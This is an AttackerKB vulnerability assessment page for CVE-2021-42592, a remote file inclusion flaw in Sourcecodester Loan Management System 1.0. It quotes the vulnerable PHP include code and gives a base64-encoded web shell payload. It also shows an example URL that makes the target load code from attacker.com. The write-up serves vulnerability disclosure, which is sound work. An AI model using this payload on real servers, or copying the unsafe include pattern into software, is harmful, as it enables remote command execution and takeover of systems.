Very High
CVE-2021-42592
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
Add References:
Very High
(1 user assessed)
Very High
(1 user assessed)Unknown
Unknown
Unknown
MITRE ATT&CK
Collection
Command and Control
Credential Access
Defense Evasion
Discovery
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Topic Tags
Description
** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.
Add Assessment
Ratings
-
Attacker ValueVery High
-
ExploitabilityVery High
Technical Analysis
A Remote Code Execution (RCE) vulnerability exists in Sourcecodester Loan Management System 1.0 via the page parameter to index.php
The bug is affecting the [index.php] file through [page] parameter due to unsafe usage of remotely [include] function;if we tak a look at the index.php file we can see the following code:
<?php $page = isset($_GET['page']) ? $_GET['page'] :'home'; ?> <?php include $page.'.php' ?>
The index file have a parameter page and by default the value is home. Then its including the home page add .php to it.
Attacker login to the panel then create a PHP file that contains malicious PHP code on a remote server then pass the malicious file URL to the target through the [page] parameter and the target execute the code which gives permissions to the attacker to do malicious activities such as ( Delete, create, modify &, etc..) on the target server and the attacker will be able to achieve RCE ( remote code execution ).
Note: To make the server execute your malicious code your code must be like that:
<?php echo base64_decode("PGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0iUE9TVCI+CgpDTUQgPGlucHV0IG5hbWU9ImNtZCIgdHlwZT0idGV4dCI+Cgo8YnI+CjxpbnB1dCBuYW1lPSJzdWIiIHR5cGU9InN1Ym1pdCI+CjwvZm9ybT4KPD9waHAKZWNobyAiPHByZT4iOwpzeXN0ZW0oQCRfUE9TVFsiY21kIl0pOwplY2hvICI8L3ByZT4iOwo/Pg=="); ?>
E.x: http://target.com/index.php?page=http://attacker.com/exploit
Note: Don’t add [.php] to your attacker URL because the script will add .php at the end of the [page] parameter value automatically.
Would you also like to delete your Exploited in the Wild Report?
Delete Assessment Only Delete Assessment and Exploited in the Wild ReportGeneral Information
References
Additional Info
Technical Analysis
Report as Emergent Threat Response
Report as Exploited in the Wild
CVE ID
AttackerKB requires a CVE ID in order to pull vulnerability data and references from the CVE list and the National Vulnerability Database. If available, please supply below:
